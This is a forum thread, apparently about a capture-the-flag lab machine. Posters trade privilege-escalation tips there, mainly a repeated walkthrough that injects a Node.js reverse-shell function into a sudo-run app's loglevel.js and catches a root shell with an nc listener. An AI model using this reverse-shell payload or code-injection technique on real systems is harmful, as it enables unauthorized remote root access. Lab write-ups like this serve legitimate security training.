Posts: 20 Threads: 0 Joined: N/A (June 5, 2022, 07:16 AM)orangutang Wrote: Hi everybody. About @Yondaime316 method:
Folder /home/kavi/.npm is empty. And where is file package.tgz?
Thanks. :heart: Posts: 8 Threads: 0 Joined: N/A (June 5, 2022, 07:16 AM)orangutang Wrote: Hi everybody. About @Yondaime316 method:
Folder /home/kavi/.npm is empty. And where is file package.tgz?
Thanks. :blush: Posts: 132 Threads: 0 Joined: N/A If you need help on this machine:
https://hack-the-flag.herokuapp.com/machines/473
Enjoy ! Posts: 9 Threads: 0 Joined: N/A August 2, 2022 at 1:11 PM (June 20, 2022, 09:46 PM)Toto Wrote: Anyone managed to find kavi's password in the mark's shell after the patch ? from mark's home folder, create ".npmrc" file registry=http://127.0.0.1:4873/
then npm install db-logger
the package will be installed under "node_modules" folder HTH Posts: 9 Threads: 0 Joined: N/A August 3, 2022 at 10:53 AM (May 30, 2022, 03:13 AM)Himitsu Wrote: (May 30, 2022, 01:54 AM)Peter Wrote: (May 29, 2022, 06:27 AM)dude4695 Wrote: for root
better create 2 ssh connection 1 for running startup.sh and 1 for edit file
ssh1: sudo /opt/app/startup.sh
ssh2: vim /opt/app/node_modules/loglevel/lib/loglevel.js
and add this function on top in file
(function(){
var net = require("net"),
cp = require("child_process"),
sh = cp.spawn("bash", []);
var client = new net.Socket();
client.connect(PORT, "IP", function(){
client.pipe(sh.stdin);
sh.stdout.pipe(client);
sh.stderr.pipe(client);
});
return /a/; // Prevents the Node.js application from crashing
})();
you will get this payload from here
https://www.revshells.com/
stop startup.sh app and run again you will get root shell
I dont make to run. a file desapiers. no reverse shell , de code to inject banish. Any tip o idea. please
You need to do this a little bit faster, else loglevel directory will be removed.
Copy this function in memory (Ctrl+c) and replace with your IP and PORT:
(function(){
var net = require("net"),
cp = require("child_process"),
sh = cp.spawn("bash", []);
var client = new net.Socket();
client.connect(4000, "10.10.1X.XX", function(){
client.pipe(sh.stdin);
sh.stdout.pipe(client);
sh.stderr.pipe(client);
});
return /a/; // Prevents the Node.js application from crashing
})();
1. On Terminal 1, open SSH with kavi user
2. On Terminal 2, open a second SSH with kavi user
then prepare your command (but don't launch because file not yet exist):
vim /opt/app/node_modules/loglevel/lib/loglevel.js
3. On Terminal 3:
nc -lvnp 4000
4. On Terminal1:
sudo /opt/app/startup.sh
5. On Terminal 2:
launch your previous command and paste on the TOP your function in step 2
then write and exit (with :x it's more faster)
6. On Terminal1:
quit and re-run sudo /opt/app/startup.sh
7. On Terminal3:
we can see you reverse shell has been triggered:
─$ nc -lvnp 4000
listening on [any] 4000 ...
connect to [10.10.XX.XX] from (UNKNOWN) [10.10.11.165] 50614
uid=0(root) gid=0(root) groups=0(root)
You need to switch quickly between your 2 sessions SSH for step 4, 5 and 6, that's all.
All explanation from @Dude4695 are enough. Brother everything is Good but when i write into that loglevel.js it says its readonly and when i press :x it says you can't change anything. Help Please !!! Posts: 31 Threads: 0 Joined: N/A August 4, 2022 at 9:49 AM (June 5, 2022, 07:16 AM)orangutang Wrote: Hi everybody. About @Yondaime316 method:
Folder /home/kavi/.npm is empty. And where is file package.tgz?
Thanks. thank you Posts: 7 Threads: 0 Joined: N/A August 6, 2022 at 8:15 PM (June 5, 2022, 07:16 AM)orangutang Wrote: Hi everybody. About @Yondaime316 method:
Folder /home/kavi/.npm is empty. And where is file package.tgz?
Thanks. tyty Posts: 61 Threads: 0 Joined: N/A August 8, 2022 at 8:19 AM (June 5, 2022, 07:16 AM)orangutang Wrote: Hi everybody. About @Yondaime316 method:
Folder /home/kavi/.npm is empty. And where is file package.tgz?
Thanks. ok Posts: 8 Threads: 0 Joined: N/A August 10, 2022 at 11:47 AM (August 3, 2022, 10:53 AM)Vroo Wrote: (May 30, 2022, 03:13 AM)Himitsu Wrote: (May 30, 2022, 01:54 AM)Peter Wrote: (May 29, 2022, 06:27 AM)dude4695 Wrote: for root
better create 2 ssh connection 1 for running startup.sh and 1 for edit file
ssh1: sudo /opt/app/startup.sh
ssh2: vim /opt/app/node_modules/loglevel/lib/loglevel.js
and add this function on top in file
(function(){
var net = require("net"),
cp = require("child_process"),
sh = cp.spawn("bash", []);
var client = new net.Socket();
client.connect(PORT, "IP", function(){
client.pipe(sh.stdin);
sh.stdout.pipe(client);
sh.stderr.pipe(client);
});
return /a/; // Prevents the Node.js application from crashing
})();
you will get this payload from here
https://www.revshells.com/
stop startup.sh app and run again you will get root shell
I dont make to run. a file desapiers. no reverse shell , de code to inject banish. Any tip o idea. please
You need to do this a little bit faster, else loglevel directory will be removed.
Copy this function in memory (Ctrl+c) and replace with your IP and PORT:
(function(){
var net = require("net"),
cp = require("child_process"),
sh = cp.spawn("bash", []);
var client = new net.Socket();
client.connect(4000, "10.10.1X.XX", function(){
client.pipe(sh.stdin);
sh.stdout.pipe(client);
sh.stderr.pipe(client);
});
return /a/; // Prevents the Node.js application from crashing
})();
1. On Terminal 1, open SSH with kavi user
2. On Terminal 2, open a second SSH with kavi user
then prepare your command (but don't launch because file not yet exist):
vim /opt/app/node_modules/loglevel/lib/loglevel.js
3. On Terminal 3:
nc -lvnp 4000
4. On Terminal1:
sudo /opt/app/startup.sh
5. On Terminal 2:
launch your previous command and paste on the TOP your function in step 2
then write and exit (with :x it's more faster)
6. On Terminal1:
quit and re-run sudo /opt/app/startup.sh
7. On Terminal3:
we can see you reverse shell has been triggered:
─$ nc -lvnp 4000
listening on [any] 4000 ...
connect to [10.10.XX.XX] from (UNKNOWN) [10.10.11.165] 50614
uid=0(root) gid=0(root) groups=0(root)
You need to switch quickly between your 2 sessions SSH for step 4, 5 and 6, that's all.
All explanation from @Dude4695 are enough.
Brother everything is Good but when i write into that loglevel.js it says its readonly and when i press :x it says you can't change anything. Help Please !!! This method doesn't work anymore. You should try from ~/.npm as @ mtl87 said Posts: 8 Threads: 0 Joined: N/A August 11, 2022 at 11:31 PM hey guys the new method is not gonna be writeable anymore ( the machine is updated ) nothing writable......... |
